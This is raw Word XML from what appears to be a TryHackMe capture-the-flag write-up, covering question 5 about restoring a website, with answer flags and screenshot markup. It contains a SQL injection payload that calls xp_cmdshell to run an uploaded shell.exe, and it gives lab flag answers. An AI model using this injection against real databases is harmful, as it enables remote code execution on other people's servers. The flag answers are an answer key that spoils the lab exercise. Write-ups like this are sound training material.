      <w:r w:rsidR="00F94AB5" w:rsidRPr="00F94AB5">
        <w:t xml:space="preserve">='; EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F94AB5" w:rsidRPr="00F94AB5">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F94AB5" w:rsidRPr="00F94AB5">
        <w:t xml:space="preserve"> 'C:\Windows\Temp\shell.exe'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D3407" w14:textId="6413ABD5" w:rsidR="00E67274" w:rsidRDefault="00E67274"/>
    <w:p w14:paraId="0ECD11C7" w14:textId="58C82466" w:rsidR="00E67274" w:rsidRDefault="002B4AEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="142E06FF" wp14:editId="112936BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>423425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6440170" cy="1259205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21241"/>
                <wp:lineTo x="21532" y="21241"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1834562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6233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9A18B" w14:textId="53E8000B" w:rsidR="00736778" w:rsidRDefault="00736778" w:rsidP="00083064">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="005301EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F3638E" w:rsidRPr="00F3638E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F3638E" w:rsidRPr="00F3638E">
        <w:t>THM{b06674fedd8dfc28ca75176d3d51409e}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B75B6" w14:textId="1E911D13" w:rsidR="00736778" w:rsidRPr="00083064" w:rsidRDefault="00736778">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00083064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:r w:rsidR="002C180E" w:rsidRPr="00083064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00083064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>) What is the flag you receive on the homepage after restoring the website?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1472B3" w14:textId="28FAE37C" w:rsidR="003C7653" w:rsidRDefault="00083064">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BF5C2F8" wp14:editId="282B696D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3976370" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="5080" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21257"/>
                <wp:lineTo x="21524" y="21257"/>
                <wp:lineTo x="21524" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="11303321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32155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21E81" w14:textId="0C4B6565" w:rsidR="00083064" w:rsidRDefault="00083064"/>
    <w:p w14:paraId="645703FE" w14:textId="7AD012D9" w:rsidR="00FA6118" w:rsidRDefault="00FA6118"/>
    <w:p w14:paraId="50AEA65C" w14:textId="3A9EF198" w:rsidR="00FA6118" w:rsidRDefault="002D3C33">
      <w:r>
        <w:t>Going back to the main webpage, I see the flag waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E9759E" w14:textId="3AAA0445" w:rsidR="005F51D7" w:rsidRDefault="005F51D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F6FE2E9" wp14:editId="2772A967">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>30767</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3414395" cy="344805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20287"/>
                <wp:lineTo x="21451" y="20287"/>
                <wp:lineTo x="21451" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="173285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522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494AB" w14:textId="1A689F0A" w:rsidR="00083064" w:rsidRDefault="00083064"/>
    <w:p w14:paraId="06E2E914" w14:textId="0392F715" w:rsidR="003C7653" w:rsidRDefault="003C7653" w:rsidP="00FA6118">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="005301EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FA6118" w:rsidRPr="00FA6118">
        <w:t xml:space="preserve"> THM{4cbc043631e322450bc55b42c}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0902D4C8" w14:textId="2DCA548F" w:rsidR="003C7653" w:rsidRDefault="003C7653"/>
    <w:p w14:paraId="5E2CBBE2" w14:textId="77777777" w:rsidR="00E90880" w:rsidRDefault="00E90880"/>
    <w:p w14:paraId="59370807" w14:textId="77777777" w:rsidR="00E90880" w:rsidRDefault="00E90880"/>
    <w:sectPr w:rsidR="00E9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53"/>
    <w:rsid w:val="00000A8C"/>
    <w:rsid w:val="00023963"/>
    <w:rsid w:val="00036B58"/>
    <w:rsid w:val="00083064"/>
    <w:rsid w:val="00093B2C"/>
    <w:rsid w:val="00095FF8"/>
    <w:rsid w:val="000A6111"/>
    <w:rsid w:val="000E7B4B"/>
    <w:rsid w:val="001153AE"/>
    <w:rsid w:val="00153160"/>
    <w:rsid w:val="001552D0"/>
    <w:rsid w:val="00160769"/>
    <w:rsid w:val="001A5A69"/>
    <w:rsid w:val="001E6C49"/>
    <w:rsid w:val="002A0C75"/>
    <w:rsid w:val="002A2C7F"/>
    <w:rsid w:val="002B4AEE"/>
    <w:rsid w:val="002C180E"/>
    <w:rsid w:val="002C4CDC"/>
    <w:rsid w:val="002D3C33"/>
    <w:rsid w:val="00312B98"/>
    <w:rsid w:val="003161F0"/>
    <w:rsid w:val="0033589F"/>
    <w:rsid w:val="00342CA0"/>
    <w:rsid w:val="003A3398"/>
    <w:rsid w:val="003C7653"/>
    <w:rsid w:val="003C7FB3"/>
    <w:rsid w:val="004129C6"/>
    <w:rsid w:val="004923BF"/>
    <w:rsid w:val="004D3B93"/>
    <w:rsid w:val="0052305C"/>
    <w:rsid w:val="005301EB"/>
    <w:rsid w:val="00532819"/>
    <w:rsid w:val="00580A18"/>
    <w:rsid w:val="005970E0"/>
    <w:rsid w:val="005A7C0F"/>
    <w:rsid w:val="005B74CD"/>
    <w:rsid w:val="005F51D7"/>
    <w:rsid w:val="006504EC"/>
    <w:rsid w:val="006A0FAE"/>
    <w:rsid w:val="006F3DF6"/>
    <w:rsid w:val="00706D67"/>
    <w:rsid w:val="00736778"/>
    <w:rsid w:val="0079133C"/>
    <w:rsid w:val="007B527A"/>
    <w:rsid w:val="007F0FED"/>
    <w:rsid w:val="008614B2"/>
    <w:rsid w:val="008722BB"/>
    <w:rsid w:val="0088385D"/>
    <w:rsid w:val="008A24AC"/>
    <w:rsid w:val="008C366E"/>
    <w:rsid w:val="008D3B53"/>
    <w:rsid w:val="00905295"/>
    <w:rsid w:val="009D3268"/>
    <w:rsid w:val="00A03EA4"/>
    <w:rsid w:val="00A37BCA"/>
    <w:rsid w:val="00AD402E"/>
    <w:rsid w:val="00AF0310"/>
    <w:rsid w:val="00AF799B"/>
    <w:rsid w:val="00BA1E03"/>
    <w:rsid w:val="00BE312F"/>
    <w:rsid w:val="00C173B3"/>
    <w:rsid w:val="00C4775E"/>
    <w:rsid w:val="00C94E2A"/>
    <w:rsid w:val="00CB7DFF"/>
    <w:rsid w:val="00CC306E"/>
    <w:rsid w:val="00D10696"/>
    <w:rsid w:val="00D70F8D"/>
    <w:rsid w:val="00D759BD"/>
    <w:rsid w:val="00D75D2F"/>
    <w:rsid w:val="00D762B5"/>
    <w:rsid w:val="00DA6CB1"/>
    <w:rsid w:val="00E67274"/>
    <w:rsid w:val="00E90880"/>
    <w:rsid w:val="00EC46D3"/>
    <w:rsid w:val="00EC7A49"/>
    <w:rsid w:val="00ED59A0"/>
    <w:rsid w:val="00EE1956"/>
    <w:rsid w:val="00F3099C"/>
    <w:rsid w:val="00F3638E"/>
    <w:rsid w:val="00F72DF6"/>
    <w:rsid w:val="00F81B19"/>
    <w:rsid w:val="00F94AB5"/>
    <w:rsid w:val="00FA42ED"/>
    <w:rsid w:val="00FA6118"/>
    <w:rsid w:val="00FB68AD"/>
    <w:rsid w:val="00FD1CB6"/>
    <w:rsid w:val="00F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0E28"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{06CEB61F-BA86-4CEA-983D-064734E1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9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10.10.201.119/giftresults.php?age=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112</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-30T10:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-30T11:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>